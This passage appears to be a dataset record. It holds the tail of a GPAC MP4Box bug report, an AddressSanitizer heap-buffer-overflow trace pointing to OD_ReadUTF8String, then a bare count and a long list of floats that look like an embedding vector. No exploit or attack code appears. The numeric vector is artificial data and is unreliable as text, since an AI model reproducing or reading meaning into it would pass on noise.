gf_isom_box_size_listing isomedia/box_funcs.c:1588 #9 0x6aa2f7 in gf_isom_box_size isomedia/box_funcs.c:1601 #10 0x6e1599 in GetMoovAndMetaSize isomedia/isom_store.c:352 #11 0x6e7a1e in WriteInterleaved isomedia/isom_store.c:1356 #12 0x6e8be9 in WriteToFile isomedia/isom_store.c:1498 #13 0x6c9001 in gf_isom_write isomedia/isom_read.c:483 #14 0x6c9392 in gf_isom_close isomedia/isom_read.c:507 #15 0x429a8e in mp4boxMain (/usr/local/bin/MP4Box+0x429a8e) #16 0x7ffff615e82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f) #17 0x41d668 in _start (/usr/local/bin/MP4Box+0x41d668) 0x60200000ef51 is located 0 bytes to the right of 1-byte region [0x60200000ef50,0x60200000ef51) allocated by thread T0 here: #0 0x7ffff6f02602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602) #1 0x79525c in OD_ReadUTF8String odf/odf_code.c:40 #2 0x79525c in gf_odf_read_sup_cid odf/odf_code.c:3197 SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __interceptor_strlen Shadow bytes around the buggy address: 0x0c047fff9d90: fa fa 00 00 fa fa 00 00 fa fa 00 fa fa fa 01 fa 0x0c047fff9da0: fa fa 00 00 fa fa 01 fa fa fa 00 00 fa fa 00 00 0x0c047fff9db0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff9dc0: fa fa 01 fa fa fa 00 00 fa fa 00 00 fa fa 01 fa 0x0c047fff9dd0: fa fa 00 00 fa fa 01 fa fa fa fd fd fa fa fd fa =>0x0c047fff9de0: fa fa fd fd fa fa fd fd fa fa[01]fa fa fa 01 fa 0x0c047fff9df0: fa fa fd fd fa fa 00 00 fa fa 00 04 fa fa 00 00 0x0c047fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c047fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe ==42612==ABORTING [Inferior 1 (process 42612) exited with code 01] ``` **System (please complete the following information):** - OS version : Ubuntu 16.04 - GPAC Version : GPAC 0.8.0-e10d39d-master branch --- end body ---
4,906
[ -0.04395993426442146, 0.03342880681157112, -0.008312067948281765, 0.004054483957588673, 0.021047210320830345, 0.025033993646502495, -0.02349945902824402, 0.05048923194408417, -0.01960294134914875, 0.02041534334421158, -0.0115992845967412, 0.005694331135600805, 0.017451582476496696, 0.01517234556376934, -0.001293824170716107, 0.00781560130417347, -0.013502409681677818, 0.01412675529718399, -0.012667441740632057, 0.008477557450532913, 0.027531376108527184, -0.05115118995308876, -0.027832264080643654, 0.05521319434046745, -0.014119233004748821, 0.026658795773983, -0.014863934367895126, 0.008936413563787937, 0.011275828815996647, 0.03893508389592171, -0.0005039896350353956, 0.013449753634631634, -0.011606806889176369, 0.03114204853773117, 0.045915715396404266, 0.005690569989383221, 0.03610672056674957, 0.07901354134082794, 0.007307850290089846, -0.0038701891899108887, -0.00906429160386324, -0.0437793992459774, -0.02607206255197525, 0.021363144740462303, -0.006830188445746899, 0.015262612141668797, 0.009575803764164448, -0.0007903046789579093, -0.036377523094415665, -0.00816162396222353, 0.027817221358418465, -0.022957857698202133, -0.028584487736225128, -0.06318676471710205, 0.0032477243803441525, -0.03285711631178856, 0.03207480534911156, -0.004411790054291487, 0.02667384035885334, 0.021618900820612907, -0.022747235372662544, 0.01910647377371788, 0.02437203750014305, 0.022566702216863632, 0.014081621542572975, -0.0010343071771785617, 0.0034263774286955595, 0.0171206034719944, -0.022356078028678894, 0.01772238314151764, -0.0031029214151203632, -0.038814727216959, -0.0012524519115686417, 0.02887033298611641, -0.0021551200188696384, -0.01850469596683979, 0.03514387458562851, 0.015247567556798458, -0.031683649867773056, 0.030811069533228874, -0.03944659233093262, 0.016052447259426117, -0.025951705873012543, 0.0273809302598238, 0.01144883967936039, 0.004723962862044573, -0.03490316495299339, -0.07895336300134659, -0.029126089066267014, -0.028103064745664597, 0.015540935099124908, 0.025259660556912422, 0.010282893665134907, 0.000949682027567178, 0.010681572370231152, 0.020625965669751167, -0.034181028604507446, -0.013246653601527214, -0.05094056576490402, 0.00027127054636366665, -0.03333853930234909, -0.006141903810203075, -0.00856782402843237, 0.011636896058917046, -0.005769553128629923, 0.00906429160386324, 0.004592323675751686, -0.016849802806973457, 0.01228380762040615, 0.15405534207820892, 0.028494222089648247, -0.004242539871484041, 0.005148969125002623, 0.02289767935872078, 0.01862505078315735, 0.031984537839889526, -0.016879891976714134, -0.012396641075611115, -0.056988444179296494, -0.0033699607010930777, 0.00044874826562590897, -0.04675820469856262, 0.00002459417919453699, 0.0015044467290863395, -0.024507436901330948, 0.04868389666080475, -0.01921178586781025, 0.0017658444121479988, -0.046517495065927505, -0.01497676782310009, -0.04826265200972557, -0.023123346269130707, 0.006555626634508371, -0.02021976374089718, 0.01482632290571928, 0.0008904444403015077, -0.016248025000095367, 0.04341833293437958, 0.0008622360765002668, 0.03153320401906967, -0.06956561654806137, -0.023860525339841843, 0.01602235808968544, -0.0023412953596562147, -0.006536821369081736, -0.005265563726425171, 0.009154558181762695, 0.002743734745308757, -0.03466245159506798, -0.02407114766538143, 0.012306374497711658, -0.025124261155724525, 0.024146370589733124, 0.008763402700424194, 0.03427129611372948, -0.013728076592087746, 0.03381996229290962, 0.034301385283470154, -0.03983775153756142, 0.0024654120206832886, -0.04197406396269798, -0.008485079742968082, 0.00906429160386324, -0.06366818398237228, -0.025891529396176338, -0.03243587166070938, 0.01641351357102394, 0.022656967863440514, -0.018459562212228775, 0.020069319754838943, -0.01662413589656353, -0.004494534805417061, 0.02348441444337368, 0.030480090528726578, -0.06541334837675095, -0.012547085992991924, 0.019768429920077324, 0.039266061037778854, -0.03252613916993141, -0.005713136401027441, -0.026809241622686386, 0.00768772279843688, -0.0020911809988319874, -0.010974938981235027, 0.020866677165031433, -0.013299309648573399, 0.031202225014567375, -0.024131326004862785, 0.018294071778655052, -0.0008584749302826822, -0.006811382714658976, -0.013946221210062504, -0.010312982834875584, -0.002457889961078763, 0.05743977800011635, -0.01970825344324112, -0.018790539354085922, 0.005227952264249325, -0.0006229350110515952, 0.018053360283374786, 0.006736160255968571, -0.012908153235912323, -0.027034908533096313, 0.00453214580193162, -0.029727868735790253, 0.044351089745759964, -0.006848993711173534, 0.05145207792520523, 0.01403648778796196, 0.017150692641735077, -0.04098112881183624, -0.022130411118268967, 0.01841442845761776, 0.01690998114645481, -0.026132240891456604, 0.01298337522894144, -0.02307821251451969, -0.011697073467075825, -0.04471215605735779, -0.019437452778220177, 0.029607512056827545, -0.012343985959887505, -0.023514503613114357, -0.02676410786807537, -0.042365219444036484, -0.020625965669751167, -0.008289502002298832, 0.007296566851437092, -0.02229590155184269, 0.009485537186264992, 0.031081870198249817, -0.008319590240716934, 0.006920455023646355, -0.004626173991709948, 0.005540125072002411, -0.006273542996495962, 0.004814229439944029, 0.008628002367913723, -0.012321419082581997, 0.018880806863307953, 0.0027606599032878876, 0.030419914051890373, -0.004475729074329138, -0.036858946084976196, 0.006187037099152803, 0.05650702118873596, -0.02608710713684559, 0.0009308764128945768, -0.01059882715344429, 0.02768182009458542, -0.013713032007217407, -0.024823371320962906, 0.009462970308959484, 0.015571024268865585, -0.010087315924465656, -0.00781560130417347, 0.02201005630195141, 0.008628002367913723, -0.0080713564530015, -0.025906573981046677, 0.017677249386906624, 0.0024541288148611784, -0.00990678183734417, 0.014736056327819824, -0.007157405372709036, -0.025139305740594864, 0.015119689516723156, -0.010516082867980003, -0.005675525404512882, -0.023123346269130707, 0.04140237346291542, -0.004535906948149204, -0.026132240891456604, -0.03363943099975586, 0.0019708252511918545, 0.0021193893626332283, 0.0018956029089167714, -0.0019426168873906136, 0.017963094636797905, -0.002958118449896574, 0.007699006237089634, -0.007589933928102255, -0.008176668547093868, 0.024958772584795952, -0.006337482016533613, -0.002852807054296136, 0.007762945257127285, 0.010734227485954762, -0.00021967272914480418, 0.01830911636352539, 0.020580831915140152, 0.025801261886954308, -0.07425948977470398, 0.017271049320697784, -0.0027775848284363747, 0.0296676903963089, -0.006694788113236427, 0.017963094636797905, -0.025109216570854187, -0.0064691212028265, -0.017271049320697784, 0.000627166242338717, -0.04696882888674736, 0.0128404526039958, -0.033188097178936005, -0.002587648341432214, -0.06366818398237228, 0.013389576226472855, -0.011960351839661598, 0.017887871712446213, 0.05473177134990692, -0.06559387594461441, -0.0441705584526062, -0.001789351343177259, -0.009101903066039085, -0.015292701311409473, -0.014006399549543858, 0.002331892494112253, -0.018384339287877083, 0.008590390905737877, -0.01663918048143387, 0.007770467549562454, -0.02975795604288578, 0.005382158327847719, 0.030404869467020035, -0.011546628549695015, -0.02089676633477211, 0.009335092268884182, -0.06812135130167007, 0.03664832189679146, -0.021874655038118362, -0.005765791982412338, 0.005115118809044361, -0.031081870198249817, -0.004298956599086523, -0.03135266900062561, -0.018369294703006744, 0.028434043750166893, 0.028403954580426216, 0.004344089888036251, -0.014277199283242226, 0.022461390122771263, 0.01025280449539423, 0.005009807646274567, -0.004701395984739065, -0.0013728076592087746, 0.003821294754743576, 0.011493973433971405, 0.00886119157075882, 0.0030690713319927454, 0.001110469806008041, 0.04988745599985123, 0.03869437053799629, 0.05304679274559021, 0.007853211835026741, 0.012915675528347492, -0.01144883967936039, -0.005261802580207586, -0.012261240743100643, 0.008056312799453735, 0.022145455703139305, -0.021648988127708435, -0.008500124327838421, 0.020249852910637856, 0.004979718942195177, -0.018354250118136406, 0.005780836567282677, 0.012035573832690716, 0.01710555888712406, -0.027546420693397522, -0.044531624764204025, 0.03649787977337837, -0.035474855452775955, 0.011584240011870861, -0.0034545857924968004, -0.0038288170471787453, 0.012456819415092468, 0.012652397155761719, -0.028088020160794258, 0.0020065559074282646, -0.029727868735790253, 0.030510179698467255, 0.03333853930234909, -0.0501883439719677, -0.0029675213154405355, 0.04555464908480644, -0.018459562212228775, 0.048623718321323395, -0.00011935669317608699, -0.0008307367097586393, -0.04308735579252243, 0.059485822916030884, -0.028118109330534935, -0.04814229533076286, -0.03222525119781494, 0.02885528840124607, -0.0262676402926445, -0.03484298661351204, 0.02389061450958252, -0.024311859160661697, 0.022070234641432762, -0.00698815518990159, 0.005833492148667574, 0.003309782827273011, 0.004701395984739065, 0.03923597186803818, 0.019046295434236526, 0.0005190341034904122, 0.03171373903751373, -0.028088020160794258, 0.013261698186397552, -0.015676334500312805, -0.002670393092557788, 0.004201167728751898, 0.03779170289635658, 0.017346270382404327, 0.007935957051813602, 0.019587896764278412, -0.04320771247148514, 0.036678411066532135, -0.03830321505665779, 0.01264487486332655, 0.020535698160529137, 0.0289455559104681, 0.027606597170233727, 0.016263069584965706, -0.017150692641735077, 0.010305460542440414, 0.027696864679455757, -0.02029498666524887, 0.008334634825587273, -0.007221344392746687, -0.006634610239416361, -0.008665612898766994, 0.0022115367464721203, -0.03342880681157112, -0.05048923194408417, -0.04540420323610306, -0.015796691179275513, 0.011674506589770317, -0.017195826396346092, 0.007973567582666874, -0.009192169643938541, -0.02628268487751484, 0.015420579351484776, -0.04555464908480644, -0.02348441444337368, -0.014209499582648277, 0.020264897495508194, -0.027997754514217377, -0.02059587650001049, 0.01060634944587946, -0.013419665396213531, 0.005337025038897991, 0.008176668547093868, -0.011975396424531937, -0.020851632580161095, -0.0012910034274682403, 0.04714936017990112, 0.0029844462405890226, 0.001352121471427381, 0.01641351357102394, -0.00024611808476038277, 0.017391404137015343, 0.03652796894311905, 0.03375978395342827, -0.007510950323194265, -0.026824286207556725, 0.0073905945755541325, -0.027922531589865685, -0.007725334260612726, 0.014269677922129631, 0.006521776784211397, 0.004024395253509283, -0.004073289688676596, 0.035595208406448364, 0.01930205151438713, -0.013103730976581573, 0.021754300221800804, -0.04648740589618683, 0.012223630212247372, -0.027802176773548126, 0.0034150942228734493, -0.008740835823118687, 0.015006856061518192, -0.03144293650984764, -0.014788711443543434, -0.013946221210062504, -0.0007780810701660812, 0.006555626634508371, 0.029426978901028633, 0.005209146998822689, 0.009425358846783638, -0.01612766832113266, 0.008673135191202164, -0.0018109778175130486, -0.019753385335206985, 0.025891529396176338, 0.0426059328019619, 0.013901088386774063, 0.0028922988567501307, -0.013818343169987202, 0.02349945902824402, -0.006502971053123474, 0.023033080622553825, -0.019753385335206985, -0.022431300953030586, 0.0445617139339447, -0.01040324941277504, -0.014721011742949486, 0.007717811968177557, -0.01839938387274742, 0.00013634048809763044, -0.04399002343416214, -0.001749859657138586, -0.03523414209485054, 0.04814229533076286, 0.01228380762040615, 0.022341033443808556, 0.005690569989383221, -0.005235474556684494, -0.0023676231503486633, -0.012261240743100643, 0.020189674571156502, 0.01611262559890747, 0.007273999974131584, 0.025154350325465202, -0.023544590920209885, 0.03902534767985344, -0.01010235957801342, -0.001702845678664744, -0.010847060941159725, -0.024748148396611214, 0.019933920353651047, -0.0035354499705135822, -0.00016983793466351926, 0.008131534792482853, 0.019979052245616913, 0.002694840310141444, -0.007153644226491451, -0.023664947599172592, 0.0437793992459774, -0.03312791883945465, 0.009711204096674919, -0.005382158327847719, 0.013351964764297009, 0.008530213497579098, 0.009071813896298409, -0.002642184728756547, -0.01602235808968544, 0.0027587793301790953, -0.006081725936383009, 0.004242539871484041, 0.016579004004597664, 0.004186123143881559, 0.020264897495508194, -0.012050618417561054, 0.004930824041366577, 0.015902001410722733, 0.016443602740764618, 0.0036181944888085127, 0.00851516891270876, -0.01502190064638853, -0.023905659094452858, 0.007326655555516481, -0.0054799471981823444, 0.0064804041758179665, 0.018158672377467155, -0.037189923226833344, -0.010591304861009121, 0.009575803764164448, -0.0065932380966842175, 0.020264897495508194, 0.001065336400642991, 0.003268410684540868, -0.0014856411144137383, 0.009741292335093021, 0.003712222445756197, -0.004419312346726656, -0.03270667418837547, -0.0034320191480219364, -0.011960351839661598, -0.021648988127708435, 0.020641010254621506, 0.03634743392467499, -0.02300299145281315, 0.006833949591964483, 0.018534783273935318, -0.005897431168705225, -0.026448173448443413, 0.01094484981149435, 0.012652397155761719, -0.015871914103627205, -0.012103274464607239, -0.003975500352680683, -0.0021645228844136, 0.008620480075478554, 0.01660909131169319, 0.003601269330829382, 0.0059576090425252914, -0.02984822355210781, 0.04699891805648804, 0.004957152064889669, -0.0177073385566473, -0.024898594245314598, 0.0018673945451155305, 0.01010235957801342, 0.0014480300014838576, -0.026553485542535782, 0.022852545604109764, 0.005795881152153015, 0.02357468008995056, 0.03057035803794861, -0.000059355126722948626, 0.019738340750336647, -0.002382667502388358, 0.012569652870297432, 0.0042801508679986, 0.010786883533000946, 0.03195444867014885, 0.021227743476629257, -0.0445617139339447, 0.01418693270534277, -0.029502201825380325, 0.02646321803331375, 0.032405782490968704, -0.002879135077819228, -0.023063167929649353, -0.01502190064638853, -0.005069985520094633, -0.028118109330534935, 0.04058997333049774, 0.013953743502497673, -0.02945706807076931, -0.0422147773206234, 0.005370874889194965, 0.0180984940379858, -0.0033417523372918367, -0.01839938387274742, 0.004565996117889881, -0.003430138574913144, 0.024131326004862785, -0.026538440957665443, 0.011178039014339447, -0.022641923278570175, 0.006487926468253136, 0.0028904182836413383, -0.007875778712332249, 0.013750643469393253, 0.04010855033993721, -0.0350235216319561, -0.023920703679323196, 0.015691379085183144, 0.017782561480998993, 0.01862505078315735, 0.00040432007517665625, 0.05003789812326431, 0.039566949009895325, -0.018354250118136406, -0.01820380613207817, -0.004596084821969271, -0.036076631397008896, -0.013186476193368435, -0.016699358820915222, 0.01642855815589428, -0.015300223603844643, -0.01641351357102394, 0.007104749791324139, 0.0018222611397504807, 0.011847518384456635, 0.015540935099124908, 0.0073454612866044044, 0.013404620811343193, 0.0035448526032269, -0.015601112507283688, -0.012516996823251247, 0.02936680056154728, 0.041251931339502335, -0.017346270382404327, -0.009342614561319351, 0.017797604203224182, -0.011569195427000523, 0.0015288940630853176, 0.006574432365596294, -0.04140237346291542, 0.013088686391711235, 0.0005970773054286838, -0.004611129406839609, -0.04001828283071518, -0.030735846608877182, 0.04320771247148514, -0.02747119776904583, 0.02210032194852829, 0.05133172497153282, 0.0007465817034244537, -0.036377523094415665, 0.026794197037816048, -0.0035486137494444847, 0.004953390918672085, 0.0034621080849319696, -0.03613680973649025, 0.013397098518908024, 0.0010832016123458743, -0.0017677249852567911, 0.004163556266576052, 0.010628916323184967, -0.0075936950743198395, 0.017075471580028534, -0.007052094209939241, -0.008733313530683517, -0.011990441009402275, 0.016248025000095367, -0.02817828767001629, 0.01790291629731655, 0.015495801344513893, -0.03007389046251774, 0.012080707587301731, 0.006299871020019054, 0.0020272419787943363, 0.011877607554197311, -0.02098703198134899, -0.049917545169591904, -0.025455238297581673, -0.03505361080169678, 0.008221801370382309, -0.014585611410439014, -0.004148512147367001, 0.015871914103627205, -0.00036177242873236537, 0.01730113849043846, 0.010854583233594894, -0.045614827424287796, 0.01752680540084839, 0.012178496457636356, -0.026914551854133606, -0.003149935510009527, 0.014916589483618736, -0.0013483604416251183, -0.007672678679227829, 0.03490316495299339, 0.00417860085144639, 0.002452248241752386, 0.015781646594405174, -0.028539355844259262, -0.01174972951412201, -0.014863934367895126, 0.029893357306718826, 0.012404163368046284, -0.024928683415055275, 0.03565538674592972, 0.012479386292397976, 0.02874997816979885, 0.006826427299529314, -0.045043136924505234, -0.038273125886917114, 0.017150692641735077, 0.022310946136713028, 0.008898802101612091, 0.0022077756002545357, -0.020249852910637856, -0.0032966190483421087, -0.0010916641913354397, -0.01603740267455578, -0.015902001410722733, 0.00019146435079164803, -0.02148349955677986, 0.001617280300706625, -0.012336463667452335, 0.018685229122638702, 0.0020874198526144028, 0.013389576226472855, -0.0007950061117298901, -0.006442793179303408, -0.013615243136882782, 0.016097581014037132, -0.024552570655941963, 0.022160500288009644, 0.01010235957801342, 0.01931709609925747, 0.011644418351352215, -0.032796937972307205, 0.004893213044852018, -0.03941650688648224, 0.017090514302253723, -0.003200710518285632, -0.015992268919944763, 0.011832473799586296, -0.025921616703271866, -0.01378073263913393, 0.02369503676891327, 0.0021156282164156437, 0.005558930803090334, 0.035083699971437454, -0.017842737957835197, 0.012050618417561054, -0.02210032194852829, 0.028494222089648247, 0.007518472615629435, -0.013103730976581573, 0.0017808888806030154, 0.009613415226340294, 0.00009767150186235085, -0.025049038231372833, -0.022431300953030586, 0.012690008617937565, -0.015360401012003422, -0.026899507269263268, 0.024748148396611214, -0.02874997816979885, 0.011764774098992348, 0.0033624384086579084, 0.008537735790014267, 0.021648988127708435, -0.010583782568573952, -0.012742663733661175, -0.010470949113368988, 0.021047210320830345, -0.021047210320830345, 0.006709832698106766, 0.017647160217165947, -0.028434043750166893, -0.00450205709785223, -0.00006581954221474007, -0.06818152964115143, 0.0036106721963733435, -0.009440403431653976, 0.00443059578537941, 0.011689551174640656, 0.01010235957801342, 0.029788045212626457, -0.003539210883900523, -0.009079336188733578, 0.002877254504710436, -0.0027606599032878876, -0.007202538661658764, 0.020129498094320297, -0.002262311754748225, 0.0010333668906241655, -0.0141794104129076, 0.03652796894311905, -0.011997963301837444, -0.01760202646255493, 0.004028156399726868, -0.017541849985718727, -0.005634153261780739, -0.034181028604507446, -0.021829523146152496, -0.021242788061499596, 0.006190798245370388, 0.017993183806538582, 0.01901620626449585, 0.008688179776072502, 0.013547543436288834, 0.033880140632390976, -0.0009365181322209537, 0.015390490181744099, -0.031322579830884933, -0.018594961613416672, 0.023213613778352737, -0.013246653601527214, 0.03412085399031639, 0.0055438862182199955, -0.011268306523561478, 0.01880558393895626, 0.01919674128293991, 0.01812858320772648, 0.0007625664584338665, -0.04889452084898949, 0.013502409681677818, -0.0008833923493511975, -0.023920703679323196, -0.011185561306774616, 0.01841442845761776, 0.0027775848284363747, -0.020941898226737976, 0.0013831506948918104, 0.001824141712859273, -0.010982461273670197, 0.005859820172190666, 0.020836587995290756, -0.02130296640098095, 0.03944659233093262, 0.0008923249552026391, 0.012389118783175945, 0.02410123683512211, -0.03643770143389702, 0.014307288452982903, -0.017556894570589066, -0.0380324125289917, 0.0051602525636553764, 0.005464902613312006, -0.025650817900896072, -0.03523414209485054, -0.021829523146152496, 0.030119024217128754, 0.057078711688518524, -0.010185104794800282, -0.0042951954528689384, -0.022070234641432762, -0.015947135165333748, 0.0037968475371599197, -0.0080713564530015, 0.005987698212265968, -0.011606806889176369, -0.010681572370231152, 0.01641351357102394, 0.042154598981142044, -0.007996134459972382, -0.013675421476364136, 0.01990383118391037, 0.004769096150994301, 0.006679743528366089, -0.012923197820782661, -0.04386966675519943, -0.010463426820933819, 0.007164927665144205, -0.034993432462215424, 0.010425816290080547, 0.001760202692821622, 0.04618651419878006, 0.009026680141687393, -0.00649168761447072, -0.007823123596608639, 0.02447734959423542, -0.009711204096674919, -0.02000914141535759, -0.02906591072678566, 0.0245676152408123, 0.01632324792444706, -0.007289044559001923, 0.011381139978766441, -0.02459770441055298, -0.0004503937379922718, 0.009147035889327526, 0.03890499472618103, -0.006232170853763819, -0.031894270330667496, 0.01681971549987793, -0.016187846660614014, -0.04230504110455513, -0.026658795773983, -0.004137228708714247, 0.022431300953030586, -0.002279236912727356, -0.0015505204210057855, 0.021573767066001892, -0.00007081477815518156, -0.02219058945775032, -0.02349945902824402, -0.027501286938786507, -0.03914570435881615, -0.012577175162732601, -0.007533517200499773, 0.0017620832659304142, -0.0231985691934824, 0.013419665396213531, -0.026207461953163147, -0.013961265794932842, -0.0015166703378781676, 0.017045382410287857, 0.021167565137147903, 0.012817886658012867, -0.023935748264193535, -0.022912723943591118, 0.01919674128293991, 0.01243425253778696, -0.0316234715282917, 0.0028847765643149614, -0.030088935047388077, -0.012479386292397976, -0.015149778686463833, 0.01742149330675602, 0.01563120260834694, 0.056386664509773254, 0.005923759192228317, 0.043237801641225815, -0.012832931242883205, -0.027019863948225975, -0.01900116167962551, -0.014307288452982903, 0.0016699358820915222, -0.020971987396478653, 0.03851383551955223, -0.032285425812006, -0.017045382410287857, -0.021724211052060127, 0.01060634944587946, 0.027004819363355637, -0.01611262559890747, -0.0018579917959868908, 0.018263984471559525, 0.014074099250137806, 0.024026013910770416, -0.03610672056674957, 0.034481920301914215, 0.0018551709363237023, -0.012765230610966682, -0.03731027990579605, -0.020926853641867638, -0.03791205957531929, -0.028313687071204185, 0.00467506842687726, 0.010117404162883759, -0.0016407872317358851, -0.0014226424973458052, 0.00484807975590229, -0.003084115916863084, 0.00975633691996336, -0.03276684880256653, 0.004656262695789337, -0.03445183113217354, 0.008312067948281765, 0.0018617528257891536, 0.0027362124528735876, -0.010282893665134907, -0.020656054839491844, -0.025500372052192688, 0.016955114901065826, -0.0004431065754033625, 0.03273675963282585, -0.0320146270096302, 0.019061340019106865, -0.00226607290096581, -0.00018405965238343924, 0.0012618546606972814, 0.02339414693415165, -0.01642855815589428, -0.0037103418726474047, 0.00410713953897357, 0.009320047684013844, 0.000353780051227659, 0.008733313530683517, -0.007559844758361578, -0.0038513836916536093, 0.007495905738323927, -0.010884672403335571, 0.005186580121517181, -0.017436537891626358, -0.03213498368859291, 0.0010944850509986281, 0.02745615318417549, -0.0013220325345173478, -0.055092841386795044, -0.01830911636352539, -0.0041748397052288055, 0.014510389417409897, 0.020084364339709282, -0.007337938994169235, 0.0071799722500145435, -0.028524311259388924, 0.017361314967274666, -0.013066120445728302, 0.04985736683011055, -0.01447277795523405, -0.014698444865643978, -0.009763859212398529, -0.0022717146202921867, -0.01054617203772068, -0.0016012955456972122, -0.008041268214583397, -0.0021664032246917486, -0.00734170014038682, -0.0019313335651531816, -0.052595458924770355, -0.03397040814161301, -0.024026013910770416, 0.001789351343177259, 0.01264487486332655, 0.0010549932485446334, 0.008229323662817478, 0.0167294479906559, 0.011757251806557178, -0.005769553128629923, -0.01772238314151764, 0.01632324792444706, -0.021137477830052376, 0.0006896948325447738, -0.007289044559001923, -0.02477823756635189, -0.027125174179673195, -0.027290664613246918, -0.019241873174905777, -0.0054799471981823444, 0.011381139978766441, -0.048623718321323395, 0.005186580121517181, 0.004904496483504772, -0.03709965571761131, 0.022431300953030586, -0.011531583964824677, -0.019527718424797058, -0.015255089849233627, 0.008590390905737877, -0.012562130577862263, -0.031292494386434555, 0.0064728823490440845, 0.024146370589733124, 0.07474091649055481, 0.00492706336081028, 0.0005782717489637434, -0.019587896764278412, 0.011005028150975704, 0.011065205559134483, 0.019587896764278412, 0.0019012446282431483, 0.024808326736092567, 0.020129498094320297, 0.010914761573076248, -0.0032420826610177755, -0.0004045551468152553, -0.0039040392730385065, 0.0046525015495717525, -0.01054617203772068, -0.00820675678551197, -0.015044467523694038, 0.018655139952898026, -0.012938242405653, -0.009598370641469955, 0.004189884290099144, 0.024823371320962906, -0.004103378392755985, 0.016940070316195488, -0.023559635505080223, 0.0003175793099217117, -0.032285425812006, -0.027019863948225975, -0.011712118051946163, -0.003764878027141094, -0.020656054839491844, -0.037972237914800644, -0.004385462496429682, -0.003586224978789687, -0.005709375254809856, 0.00671359384432435, -0.024236638098955154, -0.007928434759378433, 0.003601269330829382, -0.007604978512972593, -0.01228380762040615, -0.021363144740462303, 0.016172802075743675, 0.009252347983419895, -0.021528633311390877, 0.021618900820612907, 0.015586068853735924, -0.005652958527207375, 0.011343528516590595, -0.00801117904484272, -0.023634858429431915, 0.02775704301893711, 0.03523414209485054, 0.007981089875102043, 0.012885586358606815, -0.023333968594670296, -0.010448383167386055, -0.015676334500312805, -0.015766602009534836, 0.005382158327847719, -0.0020554503425955772, 0.0034150942228734493, 0.02688446268439293, 0.00060977105749771, -0.01573651283979416, -0.010666527785360813, 0.00906429160386324, -0.0007790213567204773, 0.03114204853773117, 0.015059512108564377, 0.0004388753150124103, 0.007928434759378433, 0.01329178735613823, 0.00029266191995702684, 0.029607512056827545, 0.003228918882086873, 0.015051989816129208, -0.03595627844333649, -0.005126402247697115, 0.02328883670270443, 0.027937576174736023, -0.012313896790146828, 0.015270134434103966, -0.013998877257108688, 0.024010969325900078, -0.013178953900933266, -0.006841471418738365, -0.002745615318417549, -0.009327569976449013, 0.0076839616522192955, 0.01642855815589428, 0.02346936985850334, 0.010959894396364689, 0.005107596516609192, 0.01663918048143387, 0.013299309648573399, -0.0226118341088295, -0.014081621542572975, -0.004754051566123962, 0.007717811968177557, 0.0014282841002568603, 0.02357468008995056, 0.0012966450303792953, -0.008056312799453735, 0.005179057829082012, 0.0041560339741408825, 0.0021099864970892668, -0.0071160332299768925, 0.006864038296043873, -0.034000497311353683, -0.013367009349167347, 0.011366095393896103, -0.020971987396478653, -0.0009407493635080755, 0.008402335457503796, 0.0031856659334152937, -0.0047465297393500805, -0.016172802075743675, -0.021077299490571022, -0.02676410786807537, -0.004242539871484041, 0.034301385283470154, -0.008116490207612514, -0.0036351194139569998, 0.010719182901084423, -0.00547618605196476, -0.02059587650001049, 0.03869437053799629, 0.03571556508541107, 0.025620728731155396, 0.0032138742972165346, 0.00030065426835790277, -0.001127394731156528, 0.031202225014567375, -0.010576260276138783, 0.03222525119781494, 0.018158672377467155, -0.004009350668638945, 0.0025199484080076218, -0.002670393092557788, 0.026147285476326942, 0.006630849093198776, 0.031804002821445465, 0.0064540766179561615, 0.00044334164704196155, 0.0030878770630806684, -0.0015326550928875804, 0.01681971549987793, 0.0006121217738837004, -0.00724015012383461, -0.02298794686794281, 0.021664032712578773, 0.03412085399031639, 0.007029527332633734, 0.006871560588479042, 0.02656853012740612, -0.03222525119781494, -0.01039572712033987, 0.004686351865530014, 0.004550951533019543, 0.004972196649760008, 0.012547085992991924, -0.010989983566105366, 0.0020648532081395388, 0.03264649584889412, -0.007699006237089634, -0.046818383038043976, -0.017165737226605415, -0.03246596083045006, 0.010373160243034363, -0.00023448212596122175, -0.014946678653359413, 0.007830644957721233, -0.009605892933905125, 0.009605892933905125, -0.02408619225025177, 0.0025274704676121473, 0.02089676633477211, -0.025650817900896072, -0.0070220050401985645, 0.018956029787659645, 0.024657882750034332, 0.000511982012540102, 0.021543677896261215, -0.020445430651307106, 0.006818905007094145, 0.000377051968825981, -0.04040943831205368, 0.009613415226340294, 0.020084364339709282, 0.03264649584889412, -0.02577117271721363, -0.007661395240575075, -0.012080707587301731, -0.02407114766538143, 0.0069317384622991085, -0.0051301633939146996, -0.01563120260834694, -0.008342157118022442, -0.016202891245484352, -0.0003864547470584512, -0.015390490181744099, 0.003563658334314823, -0.027741998434066772, -0.023318924009799957, 0.005705614108592272, 0.022626878693699837, -0.02307821251451969, 0.0137882549315691, -0.029517244547605515, 0.00046520313480868936, 0.0036464028526097536, 0.0076388283632695675, 0.0029769239481538534, 0.0262676402926445, 0.00445316219702363, -0.030690714716911316, 0.006333720870316029, 0.020264897495508194, -0.02706499770283699, 0.020069319754838943, 0.0002740914060268551, -0.011855040676891804, -0.01603740267455578, 0.013765688054263592, 0.01334444247186184, -0.019482584670186043, -0.000002967756245197961, 0.019527718424797058, -0.006333720870316029, -0.0010277251712977886, -0.0023789063561707735, 0.00758617278188467, -0.001864573685452342, -0.01334444247186184, 0.010418293997645378, -0.0013568229041993618, 0.004013111814856529, -0.01138866227120161, -0.0015204314840957522, -0.0007202539127320051, -0.016684314236044884, -0.014909067191183567, 